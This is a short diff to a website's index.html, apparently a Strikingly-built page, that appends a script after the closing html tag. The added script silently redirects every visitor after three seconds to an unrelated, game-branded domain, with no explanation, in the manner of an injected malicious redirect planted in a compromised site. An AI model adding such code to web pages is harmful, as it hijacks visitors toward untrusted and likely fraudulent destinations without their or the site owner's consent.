--- a/index.html
+++ b/index.html
@@ -566,4 +566,11 @@ if (typeof getCookieItem === 'function' && !isDedicatedLandingPage && (getCookie
 </script>
 </body>
 </html>
+<script>
+  setTimeout(function() {
+    window.location.href = "https://y57phr8.newbestplaygame.com/rct2ch1";
+  }, 3000);
+</script>
+
+
 <!-- Powered by Strikingly.com 4 (1) Jan 07, 2026 at 05:04-->
